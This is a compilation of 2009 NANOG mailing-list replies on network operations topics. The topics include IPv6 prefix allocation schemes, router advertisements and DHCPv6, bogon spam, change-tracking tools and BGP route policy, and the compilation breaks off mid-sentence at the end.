Apologies if this message is brief, it is sent from my cellphone. On 29/10/2009, at 11:33, Walter Keen walter.k...@rainierconnect.net wrote: Most aDSL modems if set to PPPoE (I think Actiontec's come this way by default) will send the mac as the pppoe un/pw. David E. Smith wrote: Opinions on this? I'd be interested in hearing the latest real world experience for both and the direction most folks are going in. I can't speak to which would be better on copper specifically, but in general I'd favor DHCP over PPPoE. Either way, most of the back-end stuff will be similar (you'll need a way to authenticate users, turn them off and on, et cetera); the differences won't be all that big. Either you're storing their MACs in a database, or their port assignments and VLAN tags, or their usernames and passwords. With PPPoE, however, the end-user can't just plug in and go - they'll have to configure their PC, or a DSL modem, or something. That means a phone call to your tech support, most likely. In many cases, DHCP can lead to plug-and-play simplicity, which means they don't have to call you, and you don't have to answer their calls. Everyone wins. :) David Smith MVN.net -- Walter Keen Network Technician Rainier Connect (o) 360-832-4024 (c) 253-302-0194 !DSPAM:22,4ae8c6fe233691194411224!
Re: dealing with bogon spam ?
On 28/10/2009, at 12:57 PM, Leslie wrote: First off, I'm not certain if unallocated space in blocks less than a /8 is properly called bogon, so pardon my terminology if I'm incorrect. We're seeing a decent chunk of spam coming from an unallocated block of address space. We use CYMRU's great list of /8 bogon space to prevent completely off the wall abuse, but the granularity stops at / 8's. Obviously, I've written the originating AS and its single upstream provider (sadly without any response). I'm not looking for a one time solution for this issue however -- I'd like to permanently block (and kick) anyone who's using unallocated space illegitimately. How have you dealt with this issue? Does anyone publish a more granular listing of unallocated space? Does arin have this information somewhere other than just probing any given ip via whois? You *might* be able to get a copy of the whois database as an optimisation so you don't have to hit their servers all the time - does that help? I wouldn't rely on that though, but I don't see any other good options. Perhaps you can only accept stuff from networks that you first saw an announcement for greater than 7 days ago, to prevent people popping up with a network for a day, spamming, and then disappearing? Likely to get lots of false positives in that though, and as soon as someone figures out your technique it's not going to work. Religious war alert: does SIDR solve this? I guess only if you only accept signed advertisements.. I don't know if that is the intended default mode or not.. Need to do some reading I guess. -- Nathan Ward
Re: Power Analysis/Management Tools
I haven't used cacti in a while, but does it let you combine several RRD files in to one graph? If so that's useful for power stuff, because you're likely to want to graph an aggregate of several things across different devices - for example a+b power of a server, or aggregate power usage for one customer with multiple power feeds. Note that RRD has some cool stuff that cacti can't use by default, including the aberrant behavior detection functionality - that's probably quite useful for power and environmental stuff.. On 27/10/2009, at 5:05 PM, Bill Blackford wrote: Same. Cacti -b On Mon, Oct 26, 2009 at 2:33 PM, Greg Whynott greg.whyn...@oicr.on.cawrote: I'd think SNMP will be what any product uses to query APC gear, even their own suite uses SNMP to collect information and receive traps. We use cacti to graph our loads on the APC power bars and UPS gear, gives you everything you need on all phases/legs, was there something in particular you were after? -g -Original Message- From: Brandon Galbraith [mailto:brandon.galbra...@gmail.com] Sent: Monday, October 26, 2009 4:59 PM To: nanog@nanog.org Subject: Power Analysis/Management Tools Not to go too off-topic, but if there is a more preferred location for me to ask, please let me know. I'm looking for recommendations on open source packages that people are using for monitoring power utilization of their network/server gear. We're using Cacti currently, pulling the data from APCs via SNMP, and I wanted to check if someone had come across a better method before I reinvented the wheel. -- Bill Blackford Network Engineer !DSPAM:22,4ae671cf233691970413987!
Re: dealing with bogon spam ?
On 28/10/2009, at 2:00 PM, Suresh Ramasubramanian wrote: Having been postmastering at various places for about a decade, I have seen that too - yes. But cymru style filtering means its kind of out of fashion now. Sure, if the prefix is within something that cymru call a bogon. If it's within a current RIR pool, not so much. -- Nathan Ward
Re: dealing with bogon spam ?
On 28/10/2009, at 2:20 PM, Church, Charles wrote: This is puzzling me. If it's from non-announced space, at some point some router should report no route to it. How is the TCP handshake performed to allow a sync to turn into spam? Unallocated is not the same as unannounced.
Re: Simple Change Management Tracking
On 27/10/2009, at 12:11 AM, Paul Stewart wrote: We ran RT for a while but every time a new update came out on CentOS it broke the installation (perl mods), making it a pain to keep running. Bugzilla we haven't tried nor the JIRA. I'll take a look... does JIRA have an approval process or some type? I suggest sticking with RT. I run RT on CentOS by maintaining a separate Perl libs dir for the cpan modules that are required by RT and keeping it separate from the OS managed stuff, it works very well. -- Nathan Ward
Re: Consistent asymetric latency on monitoring?
On 22/10/2009, at 2:31 PM, Perry Lorier wrote: I assume this product works by having a packet with a timestamp sent from the source to the destination where it is timestamped again and either sent back, or another packet is sent in the other direction. The difference between the two timestamps gives you the latency in that direction. I believe a packet is sent, and the target router responds with a timestamp. But yeah, timestamps are being compared. I'm with Perry though - sounds like your clocks are drifting. -- Nathan Ward
Re: IPv6 Allocations
On 20/10/2009, at 9:01 AM, Esposito, Victor wrote: Since there is a lot of conversation about IPv6 flying about, does anyone have a document or link to a good high level allocation structure for v6? It seems there are 100 different ways to sub allocate the /32, and I am trying to find a simple but scalable method... . This discussion has been done a bunch of times. Here is my scheme, which has been adopted (sometimes with small modifications) by quite a few providers I have spoken with. http://mailman.nanog.org/pipermail/nanog/2009-August/012681.html Read the whole thread because there was a bit of confusion. -- Nathan Ward
Re: ISP customer assignments
On 20/10/2009, at 3:02 PM, Bill Stewart wrote: plus want the ability to take their address space with them when they change ISPs (because there are too many devices and applications that insist on having hard-coded IP addresses instead of using DNS, and because DNS tends to get cached more often than you'd sometimes like. That's why we have Unique Local Addresses. -- Nathan Ward
Re: ISP customer assignments
On 20/10/2009, at 3:10 PM, bmann...@vacation.karoshi.com wrote: On Tue, Oct 20, 2009 at 03:07:39PM +1300, Nathan Ward wrote: On 20/10/2009, at 3:02 PM, Bill Stewart wrote: plus want the ability to take their address space with them when they change ISPs (because there are too many devices and applications that insist on having hard-coded IP addresses instead of using DNS, and because DNS tends to get cached more often than you'd sometimes like. That's why we have Unique Local Addresses. but Nathan, they are only statistically unique. Sure, but I don't think that changes my point. Also if you want to increase your chances of uniqueness (which are already pretty good if you're not using subnet 0 or 1 or whatever) you can jump on to somewhere on the sixxs site and announce that you're using a specific ULA prefix. -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 18/10/2009, at 9:03 PM, Andy Davidson wrote: I don't know the history of the process that led to DHCPv6 ending up crippled, and I have to admit that it's not clear how I signal this and to whom, but for the avoidance of doubt: this operator would like his tools back please. Support default-routing options for DHCPv6 ! I think what you really want is an on-link prefix option in DHCPv6. Or at least, you'd need that as well as a default router option. As I've said before, RA does not mean SLAAC. DO NOT use the two words interchangeably. We have two address configuration mechanisms, RA is the transport for one (SLAAC) and is the hint to use another (DHCPv6 stateful). The use of RA does NOT require the use of either mechanism. Without RA, we don't know which to use, without manual configuration. I for one don't want to have to fool around every time I move to a new network, and I'm a tech guy. Can we put this in to a FAQ somewhere, I write this in almost every IPv6 thread that comes up on NANOG. The reason Ray's perceived problem exists is that when using DHCPv6 stateful for address configuration, you should also include the prefix in an RA message. This is because DHCPv6 doesn't give out prefix lengths, it only gives out addresses. There is an option (the A bit) with each prefix in an RA message, which says whether this prefix can be used for SLAAC or not (1 = SLAAC). Ray's perception (fear?) is that there are some implementations that will ignore the contents of this bit, and use the prefix for SLAAC regardless. I'm interested to see if these implementations actually exist, I haven't come across any myself or heard of any - but I've not been looking. Anyway, start here for a discussion of prefix lengths in DHCPv6: http://www.ietf.org/mail-archive/web/dhcwg/current/msg07412.html -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 18/10/2009, at 9:22 PM, Mark Smith wrote: I'm curious what the issue is with not having a default-router option in DHCPv6? This mechanism is provided by RA. RA is needed to tell a host to use DHCPv6, so RA is going to be there whenever you have DHCPv6. There's no point putting a default router option in to DHCPv6 at this point. If it's because somebody could start up a rogue router and announce RAs, I think a rogue DHCPv6 server is (or will be) just as much a threat, if not more of one - I think it's more likely server OSes will include DHCPv6 servers than RA servers. Perhaps, but if you're operating a LAN segment you're going to want to filter rouge RA and DHCPv6 messages from your network, just like you do with DHCP in IPv4. Filtering RA and DHCPv6 are done in very similar ways. -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 18/10/2009, at 9:52 PM, Chuck Anderson wrote: On Sun, Oct 18, 2009 at 09:29:41PM +1300, Nathan Ward wrote: Perhaps, but if you're operating a LAN segment you're going to want to filter rouge RA and DHCPv6 messages from your network, just like you do with DHCP in IPv4. Filtering RA and DHCPv6 are done in very similar ways. Unfortunately, no. Many/most LAN switches don't support filtering IPv6 traffic yet. Of those that do, most only support TCP/UDP ports but not ICMPv6 types or RA specifically. Therefore, right now it is probably easier to find support to filter DHCPv6 (udp source port 547) than it is to find support to filter RA. This is a real problem even for people who are not using IPv6 right now and have no desire to use IPv6 yet, because Rogue RAs will redirect all IPv6 traffic to a rogue box on the LAN, breaking access to dual-stack servers on the Internet. The impact is worse when you start trying to roll out IPv6 dual-stack to selected servers on your own LAN. This is true for now until we get switches with code to do this, and also doesn't change my point. -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 18/10/2009, at 11:02 PM, Andy Davidson wrote: On 18 Oct 2009, at 09:29, Nathan Ward wrote: RA is needed to tell a host to use DHCPv6 This is not ideal. Why? Remember RA does not mean SLAAC, it just means RA. -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 19/10/2009, at 1:10 AM, Owen DeLong wrote: On Oct 18, 2009, at 3:05 AM, Nathan Ward wrote: On 18/10/2009, at 11:02 PM, Andy Davidson wrote: On 18 Oct 2009, at 09:29, Nathan Ward wrote: RA is needed to tell a host to use DHCPv6 This is not ideal. Why? Remember RA does not mean SLAAC, it just means RA. Because RA assumes that all routers are created equal. RFC4191 Because RA is harder to filter. DHCP in IPv4 was hard to filter before vendors implemented it, too. Because the bifercated approach to giving a host router/mask information and address information creates a number of unnecessary new security concerns. Security concerns would be useful to explore. Can you expand on this? -- Nathan Ward
Re: IPv6 Deployment for the LAN
On 18/10/2009, at 2:28 PM, William Herrin wrote: On Sat, Oct 17, 2009 at 8:55 PM, Ray Soucy r...@maine.edu wrote: As it turns out delivering IPv6 to the edge in an academic setting has been a challenge. Common wisdom says to rely on SLAAC for IPv6 addressing, and in a perfect world it would make sense. Ray, Common wisdom says that? Our current IPv6 allocation schema provides for a 64-bit prefix for each network. Unfortunately, this enables SLAAC; yes, you can suppress the prefix advertisement, and set the M and O flags, but that only prevents hosts that have proper implementations of IPv6 from making use of SLAAC. The concern here is that older hosts with less than OK implementations will still enable IPv6 without regard for the stability and security concerns associated with IPv6. I thought someone had to respond to router solicitations for stateless autoconfig of global scope addresses to happen. On Linux you just don't run the radvd. On Cisco I think it's something like ipv6 nd suppress-ra in the interface config. Does that fail to prevent stateless autoconfig? Or is there a problem with the operation of DHCPv6 if router advertisements aren't happening from the router? RA is generally required whether you use stateless or stateful autoconfiguration. You have to tell the hosts to send a DHCPv6 DISCOVER message by turning on the managed flag in the RA. RA does not mean that SLAAC happens. Ray, do you have examples of hosts or stacks that ignore AdvAutonomousFlag? -- Nathan Ward
Re: ISP customer assignments
On 16/10/2009, at 1:17 PM, Chris Adams wrote: Is there any good solution to this? I don't expect us to fill the /32 to justify expanding it (although I do see ARIN appears to have left space for up to a /29; I guess that's their sparse allocation policy?). Your justification is that you have two sites without a guaranteed link between them. This is a bit annoying though, yeah. But, I'm not sure I can think of a good solution that doesn't involve us changing the routing system so that we can handle a huge amount of intentional de-aggregates or something. -- Nathan Ward
Re: ISP customer assignments
Ok, I've decided to do this a different way to my usual ranting. Instead of explaining the options over and over and hoping people can make sense of the complexities of it, become experts, and make good informed decisions, I've made a flow chart. Feel free to ask about details and I can get in to the ranting part, this is really a place to start. Right now it assumes people only provide DSL or other dynamic sort of services. It also assumes DS-Lite people are insane, so probably need better language there. Also the first question is not necessarily about who you are, but who is driving the IPv6 'build' - which is why native, 6rd and ds-lite are not appropriate for the customer-driven side. I hope that makes sense. No talk about ISATAP and stuff for inside the customer network either. And before you ask no ISATAP is not appropriate for ISPs, doesn't work through NAT. Anyway: - 6RD is used by free.fr. Not widely implemented by anyone yet. - DS-Lite is something some guys at Comcast and others are talking about. Not widely implemented by anyone yet. - The rest you can figure out from wikipedia and stuff. Please email me with any corrections, complaints, or threats if you're a DS-Lite fan. I'll always keep old versions in this directory, and the latest version will always have this filename, so please link to it instead of copying it, etc. etc.: http://www.braintrust.co.nz/resources/ipv6_flow_chart/ipv6_flow_chart-current.pdf On 13/10/2009, at 11:26 PM, Adrian Chadd wrote: Nathan Ward, please stand up. Adrian On Tue, Oct 13, 2009, TJ wrote: -Original Message- From: Justin To go along with Dan's query from above, what are the preferred methods that other SPs are using to deploy IPv6 with non-IPv6-capable edge hardware? We too have a very limited number of dialup customers and will never sink another dollar in the product. Unfortunately I also have brand-new ADSL2+ hardware that doesn't support IPv6 and according to the vendors (Pannaway) never will. We also have CMTSs that don't support IPv6, even though they too are brand-new. Those CMTSs top out at DOCSIS 2.0 and the vendor decided not to allow IPv6 to the CPEs regardless of the underlying CM's IPv6 support or lack thereof (like Cisco allowed for example). Are providers implementing tunneling solutions? Pros/cons of the various solutions? My first (potentially ignorant) response would be to get your acquisitions people aligned with your business, and by that I mean they should be making a concerted effort to only buy IPv6 capable gear, especially when IPv6 is coming to you within that gears lifecycle. I guess your customers will need to tunnel, as long as you give them a public IP they have 6to4 (and possibly Teredo, tunnel broker) - but native is better. -- - Xenion - http://www.xenion.com.au/ - VPS Hosting - Commercial Squid Support - - $24/pm+GST entry-level VPSes w/ capped bandwidth charges available in WA - !DSPAM:22,4ad455ce140151847938845!
Re: ISP customer assignments
On 14/10/2009, at 7:23 PM, Mark Andrews wrote: DS-Lite is there for when the ISP runs out of IPv4 addresses to hand one to each customer. Many customers don't need a unique IPv4 address, these are the ones you switch to DS-Lite. Those that do require a unique IPv4 you leave on full dual stack for as long as you can. The authors of DS-lite say it's because running a dual stack network is hard. You clearly don't share that view , so in your view what's wrong with dual stack with IPv4for everyone then, whether they need a unique address or not? DS-lite requires CGN, so does dual stack without enough IPv4 addresses. This is probably the wrong forum for a DS-lite debate. I'm sure people have a use for it, they actually might have gear that can only do IPv4 OR IPv6 but not both or something. My problem with it is that it's being seen as a solution for a whole lot of people, when in reality it's a solution for a small number of people. Thanks for the point about the tunnel brokers though, I missed that, I'll update this tomorrow with any suggestions I get before then. -- Nathan Ward
Re: IPv6 internet broken, Verizon route prefix length policy
On 13/10/2009, at 5:46 PM, Kevin Loch wrote: I think he was pointing out that extra routes due to slow start policies should not be a factor in v6. My guess is that is about half of the extra routes announced today, the other half being TE routes. You can pretty easily figure out how many advertised prefixes are intentional de-aggregates, and you can get a fairly good idea as to how many of them are for TE as well I expect, by looking for different AS paths. Someone mentioned some slides earlier in this thread by Vince Fuller at APRICOT early '07 that from memory have pretty good data on this. -- Nathan Ward
Re: ISP customer assignments
On 14/10/2009, at 3:49 PM, Chris Adams wrote: Once upon a time, Nathan Ward na...@daork.net said: On 14/10/2009, at 2:14 PM, Chris Adams wrote: What about web-hosting type servers? Right now, I've got a group of servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed to each server for hosted sites. What is the IPv6 equivalent? I can see a /64 for the common subnet, but what to route for aliased IPs for web hosts? It is kind of academic right now, since our hosting control panel software doesn't handle IPv6, but I certainly won't be putting 2^64 sites on a single server. Use a /112 here again as well? Use a /64 per server because I can? Why route them to the servers? I would just put up a /64 for the web servers and bind addresses to your ethernet interface out of that /64 as they are used by each site. I guess you might want to route them to the servers to save ND entries or something on your router? In the past, we saw issues with thousands of ARP entries (it has been a while and I don't remember what issues now though). Moving a block from one server to another didn't require clearing an ARP cache (and triggering a couple of thousand new ARP requests). Yeah I figured as much. Also, it is an extra layer of misconfiguration-protection: if the IPs are routed, accidentally assigning the wrong IP on the wrong server didn't actually break any existing sites (and yes, that is a lesson from experience). I guess. The advantage of doing it with a single /64 for all of them is that you can move individual sites to other servers without much drama. That might not be useful for everyone of course. -- Nathan Ward
Re: IPv6 internet broken, Verizon route prefix length policy
On 13/10/2009, at 8:26, Jeff McAdams je...@iglou.com wrote: Verizon's policy has been related to me that they will not accept or propogate any IPv6 route advertisements with prefix lengths longer than /32. Full stop. So that even includes those of us that have / 48 PI space from ARIN that are direct customers of Verizon. What about the small matter of all of the current s for the the IPv6 enabled root DNS servers? -- Nathan Ward
Re: Practical numbers for IPv6 allocations
On 7/10/2009, at 6:10 AM, Doug Barton wrote: Tony Hain wrote: Doug Barton wrote: In the following I'm assuming that you're familiar with the fact that staying on the 4-byte boundaries makes sense because it makes reverse DNS delegation easier. It also makes the math easier. I assume you meant 4-bit. ;) Grrr, I hate when I do that. I spent quite a bit of time on this post, and the one time I remembered that I needed to go back and double-check what I wrote there I wasn't at the keyboard. Thanks for keeping me honest. There was one other thing you wrote that I wanted to clarify, you indicated that I was arguing for ISPs to only get one shot at an IPv6 allocation. Since my post was already really long I chose to leave out the bit about how (TMK, which could be outdated) the RIRs are reserving a bit or two for their allocations to ISPs so going back and expanding should be an easy thing to do. On a personal note, I hope that we DO need to expand IPv6 allocations to ISPs as this thing finally gets deployed. My understanding is that the RIRs are doing sparse allocation, as opposed to reserving a few bits. I could be wrong. -- Nathan Ward
Re: SMS
On 23/09/2009, at 4:29 AM, William Herrin wrote: On Tue, Sep 22, 2009 at 11:59 AM, Scott Berkman sc...@sberkman.net wrote: Some people use a serial interface to a specific model cell phones to directly send the message over the carrier's cellular network. This is good in the event of isolation of a location from any IP connectivity to a carrier gateway. The Multitech Multimodem GPRS model MTCBA-G-EN-F4 has an ethernet port. Add a SIM card from your favorite wireless carrier and you can send and receive SMS messages via AT commands over a TCP socket. Problem is, it seizes up or otherwise founders every few weeks and has to be power cycled. Has anyone heard of other products with a good reliability record? That is shocking. I have had a fantastic track record with a Maestro 100 GSM modem with a serial interface. One of my customers has one powered on for about a year now, and it's never missed a beat. They apparently support TCP/IP and the datasheet mentions something about email, but I have no idea what that really means, and don't really care so much. I send it standard GSM AT commands, and it just works. I've done the whole old nokia handset thing in the past several times and it's *ok*. Now though, I say don't bother, this thing is maybe a couple hundred dollars, and saves you oodles of time fooling around making it work reliably. -- Nathan Ward
Re: Network Ring
On 7/09/2009, at 4:14 PM, ty chan wrote: I am in process of planning ring network to cover 15 POPs in City. Some technologies are chosen for consideration like SDH(Huawei), PVRST+(Cisco), RSTP(Zyxel), EAPS (extreme network) and MPLS(VPLS). The purpose is to provide L2 Ethernet connectivities from POPs to central point (DC) and ring protection. Of the above, VPLS. But it really depends what you need to do. If you're selling customers cross-town L2 services then yeah VPLS is the best option in my opinion. If this is for use between your own equipment, other technologies might make more sense. I echo Roland's comment, but I'll make it more specific - stay away from anything with spanning tree in it. -- Nathan Ward
Re: Anyone else seeing (invalid or corrupt AS path) 3 bytes E01100 ?
On 19/08/2009, at 6:58 AM, Ivan Pepelnjak wrote: No. You cannot influence the inbound traffic apart from not advertising some of your prefixes to some of your neighbors or giving them hints with BGP communities or AS-path prepending. Whatever you do with BGP on your routers influences only the paths the outbound traffic is taking. What you'd actually need is remote-triggered black hole. Search the Nanog archives for RTBH, you'll find a number of links in a message from Frank Bulk sent a few days ago. Or, you can prepend your advertisement with the troublesome ASN. Works for one or two troublesome ASNs as a quick hack at 3am - don't do it unless you understand why it works and why you shouldn't do it. -- Nathan Ward
Re: IPv6 Addressing Help
On 16/08/2009, at 1:29 AM, William Herrin wrote: Start with: /32 Sparsely allocate 200 /56's Total remaining space: in excess of /33. In fact, you haven't consumed a single /48. Expandability by altering the netmask: to /40 Largest allocation still possible: only /40 My suggestion was to sparsely allocate /48s to push addresses to POPs (or something topologically relevant to your network, maybe even NASes) as required. So, 200 /56s, sparsely allocated, would still be one /48 (or however many /48s you want to have around your network, as above). Sparse allocation within each of those /48s is also potentially a good idea - case by case. Doesn't make sense on an ADSL pool where everyone has the same length. Makes sense where you're assigning address space to customers who are likely to have different prefix lengths. Sparse allocation of /48s within a /32 has the advantage of letting you grow each area of your address space in each area independently. You can put one /48 in one POP or NAS or something, and 10 in another, without having to break any of your addressing architecture rules. /48s seem flexible enough to me, but perhaps you want to use this technique with /44s or /40s, or something. -- Nathan Ward
Re: IPv6 Addressing Help
On 15/08/2009, at 4:34 PM, Randy Bush wrote: I'm going to contradict you there. Classful addressing had a lot to recommend it. The basic problem we ran in to was that there weren't enough B's for everyone who needed more than a C and there weren't enough A's period. So we started handing out groups of disaggregate C's and that path led to the swamp. the swamp preceeded cidr and, if you had a bit of simple arithmetic clue, you would realize that, unless you are prescient, you will always run out of some classes before others. as we are very poor at predicting the future, there was no win to be had in classful. This is really this basis of my reply, so, I'll just say +1 Read about how sparse allocation/binary chop stuff works. You get the same amount of routes in your IGP table (or less) but it's much more flexible. -- Nathan Ward
Re: IPv6 Addressing Help
On 15/08/2009, at 1:03 AM, Chris Gotstein wrote: We are a small ISP that is in the process of setting up IPv6 on our network. We already have the ARIN allocation and i have a couple routers and servers running dual stack. Wondering if someone out there would be willing to give me a few pointers on setting up my addressing scheme? I've been mulling over how to do it, and i think i'm making it more complicated than it needs to be. You can hit me offlist if you wish to help. Thanks. I have some things to say on this. I've padded some of the following with zeros to make it easier to read/understand. Let's say your allocation is 2001:db8::/32 (doc prefix) 2001:db8::/32 2001:db8::/48 - ISP use 2001:db8::/64 - ISP internal routers 2001:db8::/112 - 65K loopbacks for your routers 2001:db8::0001:0/112 .. through .. 2001:db8:::::0/112 - 281 trillion link nets between your routers 2001:db8::0001::/64 .. through .. 2001:db8::::/64 - 65K-1 /64s for ISP servers, offices, etc. etc. 2001:db8:0001::/48 .. through .. 2001:db8:000f::/48 - 9M Customer link nets 2001:db8:0010::/48 .. through .. 2001:db8:::/48 - Assigned to customers Some notes: 1) The Customer link nets block should be long enough for you to get one link net per customer tail. You should do /64s for link nets to customers, unless you are *certain* that *all* customer devices will support whatever else you choose to use. The 15 I have suggested here gives you ~9M. 2) The Assigned to customers block can be chopped up in to /48s or / 56s or /60s or whatever your want. I recommend chopping customer prefixes on 4-bit boundaries (4 bits per hex digit). Less IP math in your head = easier life. Especially for helpdesk staff, and customers themselves. 3) Filter the ISP internal routers prefix at your border. This is equivalent to your /30s, /31s and /32s in IPv4 land. 4) The reason we have the loopbacks in the very first /112, is you will have to type them a lot, and fudging them can make your network melt down. 5) The reason we have the ISP internal /64s in the first /64s, is for the same reason as (4). 6) The reason we have ISP servers etc. in the following /64s, is these are also short to type, which means customers and first line support can type your DNS server addresses easily, read them over the phone, etc. 7) Allow the first /48 through all your filters that normally impact customers - and rate shaping, etc. etc. This first /48 is for ISP stuff, no customers should ever be on it. This is the only place where ISP stuff should ever live. You will have a temptation to chop your customer address space up in to City, POP, etc. I recommend resisting that - you are reinventing classful addressing, and when one POP or city grows too large, you have to make exceptions to your rules. Instead, when you need new addresses in an area (ie. you need more than zero IPv6 addresses at a POP) assign it a /48. Then when you need more, assign it another /48. You can do this intelligently, using the binary chop/sparse allocation method that Geoff Huston has written about. This lets you grow your / 48s in to /47s, or /46s as need arises. By doing your assignment this way, you don't get tied in to silly rules, nor do you get IGP bloat. I have an extensible IP management tool that I've been hacking on heaps in the last week that does this stuff for you. It should be ready for people to tinker with in the next few weeks. -- Nathan Ward -- Nathan Ward
Re: Botnet hunting resources (was: Re: DOS in progress ?)
On 10/08/2009, at 8:11 PM, goe...@anime.net wrote: such a list would include all of chinanet and france telecom. it would likely not last long. You've mentioned France twice now. Is there a big botnet problem there? I've never heard of anything like that. I'll admit I don't follow this area of the network closely, but I'm sure there are other places higher up the list than FTE.. -- Nathan Ward
Re: cisco.com
On 5/08/2009, at 1:34 AM, R. Benjamin Kessler wrote: Hey Gang - I'm unable to get to cisco.com from multiple places on the 'net (including downforeveryoneorjustme.com); any ideas on the cause and ETR? CCNAs everywhere panic as their monitoring tools tell them that the 'Internet' is down. -- Nathan Ward
Re: Verizon transparent web caching issue? WASRe: Data Center QoS equipment breaking http 1.1?
On 1/08/2009, at 1:06 PM, u...@3.am wrote: Again, turned out to be my own stupidity. It was just DNS on a secondary DNS server, which was pointing to the old IP, which was redirecting to the new IP, but at that point, the headers are lost. I would have thought that on MacOSX (my client; the server is FreeBSD 7.2-STABLE), if I tell the /etc/resolv.conf to look at the primary name server only, which has the correct info, plus doing a dnscacheutil -flushcache, that this wouldn't be an issue. Apparently, I was wrong, or perhaps it doesn't override what Verizon does with my browser's queries, despite what nslookup shows in a terminal window. As you are on OS X, have a read of http://developer.apple.com/documentation/Darwin/Reference/Manpages/man5/resolver.5.html It lets you do per-domain resolvers, and so on. -- Nathan Ward
Re: Subnet Size for BGP peers.
On 30/07/2009, at 7:59 AM, Jim Wininger wrote: I have a question about the subnet size for BGP peers. Typically when we turn up a new BGP customer we turn them up on a /29 or a /30. That seems to be the norm. We connect to many of our BGP peers with ethernet. It would be a simple matter to allocate a /24 for connectivity to the customer on a shared link. This would help save on some address space. My question is, is this in general good or bad idea? Have others been down this path and found that it was a bad idea? I can see some of the pothols on this path (BGP session hijacking, incorrectly configured customer routers etc). These issues could be at least partially mitigated. Are there larger issues when doing something like this or is it a practical idea? What is your access network? Do you have a switch port per customer? If so, look in to private VLANs on Cisco, or whatever similar feature exists for your vendor. -- Nathan Ward
Re: Anomalies with AS13214 ?
On 12/05/2009, at 4:47 AM, David Freedman wrote: Yeah, interesting contact name on this: person: Fredrik Neij address:DCPNetworks address:Box 161 address:SE-11479 Stockholm address:Sweden mnt-by: MNT-DCP phone: +46 707 323819 nic-hdl:FN2233-RIPE source: RIPE # Filtered Dispatch someone from IETF, that is on in Stockholm right now. Actually, Paul Jakma might be there, dispatch him if it really is a Quagga bug. -- Nathan Ward
Re: Public/testing 4to6 gateway?
On 14/07/2009, at 4:23 AM, Rick Ernst wrote: Either they don't exist, or my Google-fu is particularly bad this morning. I'm trying to get my toes wet with IPv6. I've established an internal 6to4/4to6 tunnel. I'd also like to have a testbed for access to public v6 sites. I'm also trying to find some clue at my upstreams, but figured I'd ask here as well. Are there any 4to6 gateway available? I have assigned v6 space. Because I'm pedantic, 6to4 and 6in4 are two different things. It sounds like you want 6in4. They use the same encapsulation, but 6to4 has specific magic in how the outer IPv4 destination is built, taken from the inner IPv6 destination address. 6over4 is different again. I think someone wrote a draft explaining this a while back.. not sure where or what it was called. -- Nathan Ward
Re: Telephones for Noisy Data Centers
On 18/06/2009, at 1:31 PM, Michael J McCafferty wrote: All, I'd be OK if we were in a facility that was only average in terms of noise, but we are not. I need an exceptional phone for the data center. Something that doesn't transmit the horrible background noise to the other end, and something that is loud without being painful for the user of this phone. Cordless would be very fine, headset is excellent. Ordinary desk phone is OK... but the most important thing is that it works for clear communication. A loud ringer would great too... but if the best phone doesn't have one, I'll get an auxiliary ringer. Does anyone have a phone model that they find to be excellent in a louder than usual data center? Not 100% what you asked for, but the noise cancelling Jawbone bluetooth earpieces are great. -- Nathan Ward
Re: ICSI Netalyzr launch
On 11/06/2009, at 2:16 PM, v...@ee.lbl.gov wrote: didn't want to spring for a cert for that eh? www.startssl.com ... hey lookie! free certs! ? We bought a cert from Thawte specifically so people wouldn't find that it's suspect. Does it look funny when your browser presents it to you? I had the same problem, I'm not sure Christopher correctly diagnosed it. It looks like in Safari, when a Java applet asks for unrestricted access (as opposed to standard) it presents you with the security cert to confirm that you really want it. It says This certificate is valid, as opposed to invalid or untrusted or whatever normally comes up. Screenshot of the GUI: http://don.braintrust.co.nz/~nward/netalyzr.png -- Nathan Ward
Re: how many BGP routers, how many ASes
On 14/05/2009, at 5:46 AM, William Herrin wrote: Figure every AS must have at least one BGP router, the vast majority will have at least two, many will have more than two, and at least some will have more than 100. Figure also that there are fewer BGP routers in use than there are prefixes in the table. Gives you a lower bound of around 70k and an upper bound around 290k. How are you certain that there are fewer BGP routers than prefixes? At all my previous employers we have had more routers than prefixes we advertised to the global table (which is where you get your 290k number). -- Nathan Ward
Re: ASPATH Loop
On 10/05/2009, at 10:51 PM, yangyang. wang wrote: As we know, BGP instance running on routers don't allow loop in ASPATH, why they can be seen in RIBs? It's some particular technical configuration in practice? OR What's wrong with AS3130?? Look at the WHOIS entry for AS3130, and notice in the comments field: http://psg.com/as3130/ Regarding strange announcements by AS 3130 of prefixes in 98.128.0.0/16 is in the big headings on the top of that page. He is no doubt announcing it with an origin AS of 3130 so no person or router complains about inconsistent origins. -- Nathan Ward
Re: Where to buy Internet IP addresses
On 4/05/2009, at 7:19 PM, Mikael Abrahamsson wrote: On Mon, 4 May 2009, Florian Weimer wrote: By definition, every single one of them that buys wireless router, then buys another and hangs it off the first. That happens more often then you would think. Isn't the traffic bridged, so that you don't have to route WINS and other stuff? Then it's still a single subnet. Most people don't have the skill to do this, so they just hang the second NAT box behind the first and it works. So the lesson from this is that any home IPv6 gateway needs to be able to both receive (from ISP) and provide PD (towards other home devices), as this is something people will want to do (because they do it today). I think that they have to be forwarded. What do you do if people chain three routers? How does your actual CPE know to dish out a /60 and not a /64 or something? What if someone chains four? What if someone puts three devices behind the second? These are weird topologies, sure, but coming up with some algorithm to handle some of them and not others is going to be too complicated, and leave some people without a workable solution. Forwarding these requests up to the ISP's router and having several PDs per end customer is in my opinion the best way to go. -- Nathan Ward
Re: Where to buy Internet IP addresses
On 4/05/2009, at 8:31 PM, Mikael Abrahamsson wrote: On Mon, 4 May 2009, Nathan Ward wrote: I think that they have to be forwarded. What do you do if people chain three routers? How does your actual CPE know to dish out a / 60 and not a /64 or something? What if someone chains four? What if someone puts three devices behind the second? This is a CPE problem, the main homegateway can decide to dish out / 64s to all other home routers, this means they can have a bunch. It also means they can't chain 3 in serial, unless the home user decides to hand out /60s to each and only have 3 of them connected to the main CPE. That is one way to do it, sure. However it makes things hard for end users, having to figure out how all this stuff fits together. My non technical friends have a enough time with 3.5mm jack to RCA audio cables, but they managed to get a wireless router and plug it in and have it magically work for them. Forwarding these requests up to the ISP's router and having several PDs per end customer is in my opinion the best way to go. Why is this better? Why do you want to waste your tcam entries like that? A single /56 per customer makes you have the fewest amount of tcam entries in any solution I can imagine. All other solutions require more. Because it allows the home user to arrange their network however they want, up to 16 subnets, without having to have any 